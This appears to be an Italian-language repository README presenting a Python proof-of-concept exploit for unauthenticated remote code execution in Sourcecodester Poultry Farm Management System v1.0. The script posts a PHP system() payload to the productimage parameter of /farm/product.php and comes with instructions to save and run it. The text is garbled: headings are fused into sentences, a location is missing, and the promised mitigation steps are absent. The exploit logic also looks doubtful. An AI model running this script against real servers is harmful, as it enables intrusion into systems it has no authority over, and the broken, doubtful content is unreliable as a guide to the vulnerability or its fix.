
Script proof-of-concept che dimostra l'esecuzione remota di codice non autenticata in Sourcecodester Poultry Farm Management System tramite il parametro productimage vulnerabile.
Questo repository contiene uno script Proof of Concept (PoC) che dimostra una vulnerabilità di esecuzione di codice remota (RCE) non autenticata in Sourcecodester Poultry Farm Management System v1.0. La vulnerabilità è presente nel parametro productimage all'indirizzo /farm/product.php e consente a un attaccante di eseguire codice arbitrario sul server.
CVE-ID: (In attesa di assegnazione)
Panoramica:
Sourcecodester Poultry Farm Management System v1.0 contiene una vulnerabilità di esecuzione di codice remota (RCE) non autenticata tramite il parametro productimage all'indirizzo . Questa vulnerabilità consente a un attaccante di eseguire codice arbitrario sul server senza autenticazione.
/farm/product.phpVersione Affetta:
requests (pip install requests)Questo script dimostra come un attaccante possa sfruttare la vulnerabilità RCE inviando una richiesta dannosa al parametro vulnerabile.
Salva il seguente script come rce_poc.py ed eseguilo.
import requests
# Configuration
target_url = "http://target-url/farm/product.php" # Change this to the target URL
# Malicious payload
# The payload should be a command that the server can execute, e.g., 'ls' to list directory contents
# Here, we are using a simple PHP payload to demonstrate the RCE
payload = "<?php system('ls'); ?>"
# Construct the malicious request
data = {
'productimage': payload # The vulnerable parameter
}
def exploit_rce(url, data):
"""
Exploit the RCE vulnerability by sending a malicious request to the target URL.
Args:
url (str): The target URL.
data (dict): The data to be sent in the POST request.
"""
try:
response = requests.post(url, data=data)
# Print the response details
print("Status Code:", response.status_code)
print("Response Body:", response.text)
if response.status_code == 200:
print("[+] Successfully executed the payload.")
else:
print("[-] Failed to execute the payload.")
except requests.RequestException as e:
print(f"[-] An error occurred: {e}")
if __name__ == "__main__":
print(f"Sending malicious request to: {target_url}")
exploit_rce(target_url, data)
target_url sull'URL dell'endpoint /farm/product.php del server vulnerabile.productimage.exploit_rce() invia la richiesta dannosa all'URL di destinazione e stampa i dettagli della risposta.Per mitigare questa vulnerabilità, applica i seguenti passaggi:
Seguendo questi passaggi di mitigazione e le migliori pratiche di sicurezza, puoi prevenire vulnerabilità come questo problema RCE in Sourcecodester Poultry Farm Management System v1.0.